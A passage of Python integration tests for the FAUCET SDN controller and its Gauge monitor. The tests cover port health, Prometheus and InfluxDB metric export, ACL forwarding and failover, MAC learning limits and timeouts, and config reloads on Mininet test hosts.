port_speed_mbps = (port_desc['curr_speed'] * 1e3) / 1e6
error('DP %u is %s, at %u mbps\n' % (dp_port, port_name, port_speed_mbps))
if port_speed_mbps < min_mbps:
error('port speed %u below minimum %u mbps\n' % (
port_speed_mbps, min_mbps))
elif port_config != 0:
error('port config %u must be 0 (all clear)' % port_config)
elif port_state not in (0, 4):
error('state %u must be 0 (all flags clear or live)\n' % (
port_state))
else:
return
time.sleep(1)
self.fail('DP port %u not healthy (%s)' % (dp_port, port_desc))
def test_portmap(self):
prom_desc = self.scrape_prometheus(
controller='faucet', var='of_dp_desc_stats')
self.assertIsNotNone(prom_desc, msg='Cannot scrape of_dp_desc_stats')
error('DP: %s\n' % prom_desc[0])
error('port_map: %s\n' % self.port_map)
for i, host in enumerate(self.hosts_name_ordered(), start=1):
in_port = 'port_%u' % i
dp_port = self.port_map[in_port]
if dp_port in self.switch_map:
error('verifying cabling for %s: host %s -> dp %u\n' % (
in_port, self.switch_map[dp_port], dp_port))
else:
error('verifying host %s -> dp %s\n' % (
in_port, dp_port))
self.verify_dp_port_healthy(dp_port)
self.require_host_learned(host, in_port=dp_port)
learned = self.prom_macs_learned()
self.assertEqual(
len(self.hosts_name_ordered()), len(learned),
msg='test requires exactly %u hosts learned (got %s)' % (
len(self.hosts_name_ordered()), learned))
def test_listening(self):
msg_template = (
'Processes listening on test, or all interfaces may interfere with tests. '
'Please deconfigure them (e.g. configure interface as "unmanaged"):\n\n%s')
controller = self._get_controller()
ss_out = controller.cmd('ss -lnep').splitlines()
listening_all_re = re.compile(r'^.+\s+(\*:\d+|:::\d+)\s+(:+\*|\*:\*).+$')
listening_all = [line for line in ss_out if listening_all_re.match(line)]
for test_intf in list(self.switch_map.values()):
int_re = re.compile(r'^.+\b%s\b.+$' % test_intf)
listening_int = [line for line in ss_out if int_re.match(line)]
self.assertFalse(
len(listening_int),
msg=(msg_template % '\n'.join(listening_int)))
if listening_all:
print('Warning: %s' % (msg_template % '\n'.join(listening_all)))
def test_silence(self):
# Make all test hosts silent and ensure we hear no other packets.
for host in self.hosts_name_ordered():
self.host_drop_all_ips(host)
host.cmd('echo 1 > /proc/sys/net/ipv6/conf/%s/disable_ipv6' % host.defaultIntf())
for host in self.hosts_name_ordered():
tcpdump_filter = ''
tcpdump_txt = self.tcpdump_helper(
host, tcpdump_filter, [], timeout=10, vflags='-vv', packets=1)
self.tcpdump_rx_packets(tcpdump_txt, 0)
self.assertTrue(
self.tcpdump_rx_packets(tcpdump_txt, 0),
msg='got unexpected packet from test switch: %s' % tcpdump_txt)
class FaucetUntaggedPrometheusGaugeTest(FaucetUntaggedTest):
"""Testing Gauge Prometheus"""
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
"""
config_ports = {'gauge_prom_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
db: 'prometheus'
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
db: 'prometheus'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
db: 'prometheus'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def _start_gauge_check(self):
if not self.gauge_controller.listen_port(self.config_ports['gauge_prom_port']):
return 'gauge not listening on prometheus port'
return None
def test_untagged(self):
self.wait_dp_status(1, controller='gauge')
self.assertIsNotNone(self.scrape_prometheus_var(
'faucet_pbr_version', any_labels=True, controller='gauge', retries=3))
conf = self._get_faucet_conf()
cookie = conf['dps'][self.DP_NAME]['cookie']
if not self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS):
self.fail(msg='Gauge Prometheus port counters not increasing')
for _ in range(self.DB_TIMEOUT * 3):
updated_counters = True
for host in self.hosts_name_ordered():
host_labels = {
'dp_id': self.dpid,
'dp_name': self.DP_NAME,
'cookie': cookie,
'eth_dst': host.MAC(),
'inst_count': str(1),
'table_id': str(self._ETH_DST_TABLE),
'vlan': str(100),
'vlan_vid': str(4196)
}
packet_count = self.scrape_prometheus_var(
'flow_packet_count_eth_dst', labels=host_labels, controller='gauge')
byte_count = self.scrape_prometheus_var(
'flow_byte_count_eth_dst', labels=host_labels, controller='gauge')
if packet_count is None or packet_count == 0:
updated_counters = False
if byte_count is None or byte_count == 0:
updated_counters = False
if updated_counters:
return
time.sleep(1)
self.fail(msg='Gauge Prometheus flow counters not increasing')
class FaucetUntaggedInfluxTest(FaucetUntaggedTest):
"""Basic untagged VLAN test with Influx."""
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {'gauge_influx_port': None}
influx_log = None
server_thread = None
server = None
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 2
db: 'influx'
port_state:
dps: ['%s']
type: 'port_state'
interval: 2
db: 'influx'
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 2
db: 'influx'
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
def setup_influx(self):
self.influx_log = os.path.join(self.tmpdir, 'influx.log')
if self.server:
self.server.influx_log = self.influx_log
self.server.timeout = self.DB_TIMEOUT
def setUp(self): # pylint: disable=invalid-name
self.handler = InfluxPostHandler
super(FaucetUntaggedInfluxTest, self).setUp()
self.setup_influx()
def tearDown(self, ignore_oferrors=False): # pylint: disable=invalid-name
if self.server:
self.server.shutdown()
self.server.socket.close()
super(FaucetUntaggedInfluxTest, self).tearDown(ignore_oferrors=ignore_oferrors)
def _wait_error_shipping(self, timeout=None):
if timeout is None:
timeout = self.DB_TIMEOUT * 3 * 2
gauge_log_name = self.env['gauge']['GAUGE_LOG']
self.wait_until_matching_lines_from_file(
r'.+error shipping.+', gauge_log_name, timeout=timeout)
def _verify_influx_log(self, retries=3):
self.assertTrue(os.path.exists(self.influx_log))
expected_vars = {
'dropped_in', 'dropped_out', 'bytes_out', 'flow_packet_count',
'errors_in', 'errors_out', 'bytes_in', 'flow_byte_count',
'port_state_reason', 'packets_in', 'packets_out'}
observed_vars = set()
for _ in range(retries):
with open(self.influx_log) as influx_log:
influx_log_lines = influx_log.readlines()
for point_line in influx_log_lines:
point_fields = point_line.strip().split()
self.assertEqual(3, len(point_fields), msg=point_fields)
ts_name, value_field, _ = point_fields
value = float(value_field.split('=')[1])
ts_name_fields = ts_name.split(',')
self.assertGreater(len(ts_name_fields), 1)
observed_vars.add(ts_name_fields[0])
label_values = {}
for label_value in ts_name_fields[1:]:
label, value = label_value.split('=')
label_values[label] = value
if ts_name.startswith('flow'):
self.assertTrue('inst_count' in label_values, msg=point_line)
if 'vlan_vid' in label_values:
self.assertEqual(
int(label_values['vlan']), int(value) ^ 0x1000)
if expected_vars == observed_vars:
break
time.sleep(1)
self.assertEqual(expected_vars, observed_vars)
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
def _wait_influx_log(self):
for _ in range(self.DB_TIMEOUT * 3):
if os.path.exists(self.influx_log):
return
time.sleep(1)
def _start_gauge_check(self):
influx_port = self.config_ports['gauge_influx_port']
try:
self.server = QuietHTTPServer(
(mininet_test_util.LOCALHOST, influx_port),
self.handler) # pytype: disable=attribute-error
self.server.timeout = self.DB_TIMEOUT
self.server_thread = threading.Thread(
target=self.server.serve_forever)
self.server_thread.daemon = True
self.server_thread.start()
return None
except socket.error as err:
return 'cannot start Influx test server: %s' % err
def test_untagged(self):
self.ping_all_when_learned()
self.hup_gauge()
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedMultiDBWatcherTest(
FaucetUntaggedInfluxTest, FaucetUntaggedPrometheusGaugeTest):
GAUGE_CONFIG_DBS = """
prometheus:
type: 'prometheus'
prometheus_addr: '::1'
prometheus_port: %(gauge_prom_port)d
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.1'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_retries: 1
""" + """
influx_timeout: %u
""" % FaucetUntaggedTest.DB_TIMEOUT
config_ports = {
'gauge_prom_port': None,
'gauge_influx_port': None}
def get_gauge_watcher_config(self):
return """
port_stats:
dps: ['%s']
type: 'port_stats'
interval: 5
dbs: ['prometheus', 'influx']
port_state:
dps: ['%s']
type: 'port_state'
interval: 5
dbs: ['prometheus', 'influx']
flow_table:
dps: ['%s']
type: 'flow_table'
interval: 5
dbs: ['prometheus', 'influx']
""" % (self.DP_NAME, self.DP_NAME, self.DP_NAME)
@staticmethod
def test_tagged():
return
def test_untagged(self):
self.wait_dp_status(1, controller='gauge')
self.assertTrue(self.wait_ports_updating(self.port_map.keys(), self.PORT_VARS))
self.ping_all_when_learned()
self.hup_gauge()
self.flap_all_switch_ports()
self._wait_influx_log()
self._verify_influx_log()
class FaucetUntaggedInfluxDownTest(FaucetUntaggedInfluxTest):
def _start_gauge_check(self):
return None
def test_untagged(self):
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
class FaucetUntaggedInfluxUnreachableTest(FaucetUntaggedInfluxTest):
GAUGE_CONFIG_DBS = """
influx:
type: 'influx'
influx_db: 'faucet'
influx_host: '127.0.0.2'
influx_port: %(gauge_influx_port)d
influx_user: 'faucet'
influx_pwd: ''
influx_timeout: 2
"""
def _start_gauge_check(self):
return None
def test_untagged(self):
self.gauge_controller.cmd(
'route add 127.0.0.2 gw 127.0.0.1 lo')
self.ping_all_when_learned()
self._wait_error_shipping()
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
class FaucetSingleUntaggedInfluxTooSlowTest(FaucetUntaggedInfluxTest):
def setUp(self): # pylint: disable=invalid-name
self.handler = SlowInfluxPostHandler
super().setUp()
self.setup_influx()
def test_untagged(self):
self.ping_all_when_learned()
self._wait_influx_log()
self.assertTrue(os.path.exists(self.influx_log))
self._wait_error_shipping()
self.verify_no_exception(self.env['gauge']['GAUGE_EXCEPTION_LOG'])
class FaucetNailedForwardingTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedForwardingOrderedTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- port: %(port_2)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- port: %(port_2)d
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
%(port_2)d:
native_vlan: 100
acl_in: 2
%(port_3)d:
native_vlan: 100
acl_in: 3
%(port_4)d:
native_vlan: 100
acl_in: 4
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[0:2]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingTest(FaucetNailedForwardingTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetNailedFailoverForwardingOrderedTest(FaucetNailedForwardingTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
acls:
1:
- rule:
dl_dst: "0e:00:00:00:02:02"
actions:
output:
- failover:
group_id: 1001
ports: [%(port_2)d, %(port_3)d]
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.2"
actions:
output:
- failover:
group_id: 1002
ports: [%(port_2)d, %(port_3)d]
- rule:
actions:
allow: 0
2:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
3:
- rule:
dl_dst: "0e:00:00:00:01:01"
actions:
output:
- port: %(port_1)d
- rule:
dl_type: 0x806
dl_dst: "ff:ff:ff:ff:ff:ff"
arp_tpa: "10.0.0.1"
actions:
output:
- port: %(port_1)d
- rule:
actions:
allow: 0
4:
- rule:
actions:
allow: 0
"""
def test_untagged(self):
first_host, second_host, third_host = self.hosts_name_ordered()[0:3]
first_host.setMAC('0e:00:00:00:01:01')
second_host.setMAC('0e:00:00:00:02:02')
third_host.setMAC('0e:00:00:00:02:02')
third_host.setIP(second_host.IP())
self.one_ipv4_ping(
first_host, second_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
second_host, first_host.IP(), require_host_learned=False)
self.set_port_down(self.port_map['port_2'])
self.one_ipv4_ping(
first_host, third_host.IP(), require_host_learned=False)
self.one_ipv4_ping(
third_host, first_host.IP(), require_host_learned=False)
class FaucetUntaggedLLDPBlockedTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_lldp_blocked()
# Verify 802.1x flood block triggered.
self.wait_nonzero_packet_count_flow(
{'dl_dst': '01:80:c2:00:00:00/ff:ff:ff:ff:ff:f0'},
table_id=self._FLOOD_TABLE)
class FaucetUntaggedCDPTest(FaucetUntaggedTest):
def test_untagged(self):
self.ping_all_when_learned()
self.verify_cdp_blocked()
class FaucetTaggedAndUntaggedSameVlanTest(FaucetTest):
"""Test mixture of tagged and untagged hosts on the same VLAN."""
N_TAGGED = 1
N_UNTAGGED = 3
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "mixed"
"""
CONFIG = """
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetTaggedAndUntaggedSameVlanTest, self).setUp()
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=1, n_untagged=3, links_per_host=self.LINKS_PER_HOST,
hw_dpid=self.hw_dpid)
self.start_net()
def test_untagged(self):
"""Test connectivity including after port flapping."""
self.ping_all_when_learned()
self.flap_all_switch_ports()
self.ping_all_when_learned()
self.verify_broadcast()
self.verify_no_bcast_to_self()
class FaucetTaggedAndUntaggedSameVlanEgressTest(FaucetTaggedAndUntaggedSameVlanTest):
REQUIRES_METADATA = True
CONFIG = """
egress_pipeline: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetTaggedAndUntaggedSameVlanGroupTest(FaucetTaggedAndUntaggedSameVlanTest):
CONFIG = """
group_table: True
interfaces:
%(port_1)d:
tagged_vlans: [100]
%(port_2)d:
native_vlan: 100
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
class FaucetUntaggedMaxHostsTest(FaucetUntaggedTest):
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: 2
"""
CONFIG = CONFIG_BOILER_UNTAGGED
def test_untagged(self):
self.pingAll()
learned_hosts = [
host for host in self.hosts_name_ordered() if self.host_learned(host)]
self.assertEqual(2, len(learned_hosts))
self.assertEqual(2, self.scrape_prometheus_var(
'vlan_hosts_learned', {'vlan': '100'}))
self.assertGreater(
self.scrape_prometheus_var(
'vlan_learn_bans', {'vlan': '100'}), 0)
class FaucetMaxHostsPortTest(FaucetUntaggedTest):
MAX_HOSTS = 3
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
interfaces:
%(port_1)d:
native_vlan: 100
%(port_2)d:
native_vlan: 100
max_hosts: 3
%(port_3)d:
native_vlan: 100
%(port_4)d:
native_vlan: 100
"""
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
self.ping_all_when_learned()
for i in range(10, 10+(self.MAX_HOSTS*2)):
mac_intf = 'mac%u' % i
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
ping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c1 -t1 -I%s %s > /dev/null 2> /dev/null' % (
self.FPING_ARGS_SHORT, mac_intf, first_host.IP()),
2)
second_host.cmd(ping_cmd)
flows = self.get_matching_flows_on_dpid(
self.dpid,
{'dl_vlan': '100', 'in_port': int(self.port_map['port_2'])},
table_id=self._ETH_SRC_TABLE)
self.assertEqual(self.MAX_HOSTS, len(flows))
port_labels = self.port_labels(self.port_map['port_2'])
self.assertGreater(
self.scrape_prometheus_var(
'port_learn_bans', port_labels), 0)
learned_macs = [
mac for _, mac in self.scrape_prometheus_var(
'learned_macs', dict(port_labels, vlan=100),
multiple=True) if mac]
self.assertEqual(self.MAX_HOSTS, len(learned_macs))
class FaucetSingleHostsTimeoutPrometheusTest(FaucetUntaggedTest):
"""Test that hosts learned and reported in Prometheus, time out."""
TIMEOUT = 15
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
timeout: 25
arp_neighbor_timeout: 12
nd_neighbor_timeout: 12
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
""" + CONFIG_BOILER_UNTAGGED
def hosts_learned(self, hosts):
"""Check that hosts are learned by FAUCET on the expected ports."""
macs_learned = []
for mac, port in hosts.items():
if self.prom_mac_learned(mac, port=port):
self.mac_learned(mac, in_port=port)
macs_learned.append(mac)
return macs_learned
def verify_hosts_learned(self, first_host, second_host, mac_ips, hosts):
mac_ipv4s = [mac_ipv4 for mac_ipv4, _ in mac_ips]
fping_cmd = mininet_test_util.timeout_cmd(
'fping %s -c%u %s' % (
self.FPING_ARGS_SHORT, int(self.TIMEOUT / 3), ' '.join(mac_ipv4s)),
self.TIMEOUT / 2)
for _ in range(3):
fping_out = first_host.cmd(fping_cmd)
self.assertTrue(fping_out, msg='fping did not complete: %s' % fping_cmd)
macs_learned = self.hosts_learned(hosts)
if len(macs_learned) == len(hosts):
return
time.sleep(1)
first_host_diag = first_host.cmd('ifconfig -a ; arp -an')
second_host_diag = second_host.cmd('ifconfig -a ; arp -an')
self.fail('%s cannot be learned (%s != %s)\nfirst host %s\nsecond host %s\n' % (
mac_ips, macs_learned, fping_out, first_host_diag, second_host_diag))
def test_untagged(self):
first_host, second_host = self.hosts_name_ordered()[:2]
all_learned_mac_ports = {}
# learn batches of hosts, then down them
for base in (10, 20, 30):
def add_macvlans(base, count):
mac_intfs = []
mac_ips = []
learned_mac_ports = {}
for i in range(base, base + count):
mac_intf = 'mac%u' % i
mac_intfs.append(mac_intf)
mac_ipv4 = '10.0.0.%u' % i
self.add_macvlan(second_host, mac_intf, ipa=mac_ipv4)
macvlan_mac = self.get_mac_of_intf(mac_intf, second_host)
learned_mac_ports[macvlan_mac] = self.port_map['port_2']
mac_ips.append((mac_ipv4, macvlan_mac))
return (mac_intfs, mac_ips, learned_mac_ports)
def down_macvlans(macvlans):
for macvlan in macvlans:
second_host.cmd('ip link set dev %s down' % macvlan)
def learn_then_down_hosts(base, count):
mac_intfs, mac_ips, learned_mac_ports = add_macvlans(base, count)
self.verify_hosts_learned(first_host, second_host, mac_ips, learned_mac_ports)
down_macvlans(mac_intfs)
return learned_mac_ports
learned_mac_ports = learn_then_down_hosts(base, 5)
all_learned_mac_ports.update(learned_mac_ports)
# make sure at least one host still learned
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.assertTrue(learned_macs)
before_expiry_learned_macs = learned_macs
# make sure they all eventually expire
for _ in range(self.TIMEOUT * 3):
learned_macs = self.hosts_learned(all_learned_mac_ports)
self.verify_learn_counters(
100, list(range(1, len(self.hosts_name_ordered()) + 1)))
if not learned_macs:
break
time.sleep(1)
self.assertFalse(learned_macs, msg='MACs did not expire: %s' % learned_macs)
self.assertTrue(before_expiry_learned_macs)
for mac in before_expiry_learned_macs:
self.wait_until_no_matching_flow({'eth_dst': mac}, table_id=self._ETH_DST_TABLE)
class FaucetSingleHostsNoIdleTimeoutPrometheusTest(FaucetSingleHostsTimeoutPrometheusTest):
"""Test broken reset idle timer on flow refresh workaround."""
CONFIG = """
timeout: 15
arp_neighbor_timeout: 4
nd_neighbor_timeout: 4
ignore_learn_ins: 0
learn_jitter: 0
cache_update_guard_time: 1
idle_dst: False
""" + CONFIG_BOILER_UNTAGGED
class FaucetSingleL3LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate least hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 512
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.254.254'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
faucet_vips: ["10.0.254.254/16"]
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
ipv4_fib: %u
""" % (_max_hosts() + 64, _max_hosts() + 64, _max_hosts() + 64) +
"""
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetSingleL2LearnMACsOnPortTest(FaucetUntaggedTest):
# TODO: currently set to accommodate least hardware
def _max_hosts(): # pylint: disable=no-method-argument,no-self-use
return 1024
MAX_HOSTS = _max_hosts()
TEST_IPV4_NET = '10.0.0.0'
TEST_IPV4_PREFIX = 16 # must hold more than MAX_HOSTS + 4
LEARN_IPV4 = '10.0.0.1'
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
max_hosts: %u
""" % (_max_hosts() + 4)
CONFIG = ("""
ignore_learn_ins: 0
metrics_rate_limit_sec: 3
table_sizes:
eth_src: %u
eth_dst: %u
""" % (_max_hosts() + 64, _max_hosts() + 64) +
"""
interfaces:
%(port_1)d:
native_vlan: 100
max_hosts: 4096
%(port_2)d:
native_vlan: 100
max_hosts: 4096
%(port_3)d:
native_vlan: 100
max_hosts: 4096
%(port_4)d:
native_vlan: 100
max_hosts: 4096
""")
def test_untagged(self):
test_net = ipaddress.IPv4Network(
'%s/%s' % (self.TEST_IPV4_NET, self.TEST_IPV4_PREFIX))
learn_ip = ipaddress.IPv4Address(self.LEARN_IPV4)
self.verify_learning(test_net, learn_ip, 64, self.MAX_HOSTS)
class FaucetUntaggedHUPTest(FaucetUntaggedTest):
"""Test handling HUP signal without config change."""
def _configure_count_with_retry(self, expected_count):
for _ in range(3):
configure_count = self.get_configure_count()
if configure_count == expected_count:
return
time.sleep(1)
self.fail('configure count %u != expected %u' % (
configure_count, expected_count))
def test_untagged(self):
"""Test that FAUCET receives HUP signal and keeps switching."""
init_config_count = self.get_configure_count()
reload_type_vars = (
'faucet_config_reload_cold',
'faucet_config_reload_warm')
reload_vals = {}
for var in reload_type_vars:
reload_vals[var] = self.scrape_prometheus_var(
var, dpid=True, default=None)
for i in range(init_config_count, init_config_count+3):
self._configure_count_with_retry(i)
with open(self.faucet_config_path, 'a') as config_file:
config_file.write('\n')
self.verify_faucet_reconf(change_expected=False)
self._configure_count_with_retry(i+1)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_disconnections_total', dpid=True, default=None),
0)
self.assertEqual(
self.scrape_prometheus_var(
'of_dp_connections_total', dpid=True, default=None),
1)
self.wait_until_controller_flow()
self.ping_all_when_learned()
for var in reload_type_vars:
self.assertEqual(
reload_vals[var],
self.scrape_prometheus_var(var, dpid=True, default=None))
class FaucetIPv4TupleTest(FaucetTest):
MAX_RULES = 1024
ETH_TYPE = IPV4_ETH
NET_BASE = ipaddress.IPv4Network('10.0.0.0/16')
N_UNTAGGED = 4
N_TAGGED = 0
LINKS_PER_HOST = 1
CONFIG_GLOBAL = """
vlans:
100:
description: "untagged"
"""
CONFIG = """
table_sizes:
port_acl: 1100
interfaces:
%(port_1)d:
native_vlan: 100
acl_in: 1
"""
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
- rule:
actions: {allow: 1}
eth_type: 2048
ip_proto: 6
ipv4_dst: 127.0.0.1
ipv4_src: 127.0.0.1
tcp_dst: 65535
tcp_src: 65535
"""
def setUp(self): # pylint: disable=invalid-name
super(FaucetIPv4TupleTest, self).setUp()
self.acl_config_file = os.path.join(self.tmpdir, 'acl.txt')
self.CONFIG = '\n'.join(
(self.CONFIG, 'include:\n - %s' % self.acl_config_file))
open(self.acl_config_file, 'w').write(self.START_ACL_CONFIG)
self.topo = self.topo_class(
self.OVS_TYPE, self.ports_sock, self._test_name(), [self.dpid],
n_tagged=self.N_TAGGED, n_untagged=self.N_UNTAGGED,
links_per_host=self.LINKS_PER_HOST, hw_dpid=self.hw_dpid)
self.start_net()
def _push_tuples(self, eth_type, host_ips):
max_rules = len(host_ips)
rules = 1
while rules <= max_rules:
rules_yaml = []
for rule in range(rules):
host_ip = host_ips[rule]
port = (rule + 1) % 2**16
ip_match = str(host_ip)
rule_yaml = {
'eth_type': eth_type,
'ip_proto': 6,
'tcp_src': port,
'tcp_dst': port,
'ipv%u_src' % host_ip.version: ip_match,
'ipv%u_dst' % host_ip.version: ip_match,
'actions': {'allow': 1},
}
rules_yaml.append({'rule': rule_yaml})
yaml_acl_conf = {'acls': {1: {'exact_match': True, 'rules': rules_yaml}}}
tuple_txt = '%u IPv%u tuples\n' % (len(rules_yaml), host_ip.version)
error('pushing %s' % tuple_txt)
self.reload_conf(
yaml_acl_conf, self.acl_config_file, # pytype: disable=attribute-error
restart=True, cold_start=False)
error('pushed %s' % tuple_txt)
self.wait_until_matching_flow(
{'tp_src': port, 'ip_proto': 6, 'dl_type': eth_type}, table_id=0)
rules *= 2
def test_tuples(self):
host_ips = [host_ip for host_ip in itertools.islice(
self.NET_BASE.hosts(), self.MAX_RULES)]
self._push_tuples(self.ETH_TYPE, host_ips)
class FaucetIPv6TupleTest(FaucetIPv4TupleTest):
MAX_RULES = 1024
ETH_TYPE = IPV6_ETH
NET_BASE = ipaddress.IPv6Network('fc00::00/64')
START_ACL_CONFIG = """
acls:
1:
exact_match: True
rules:
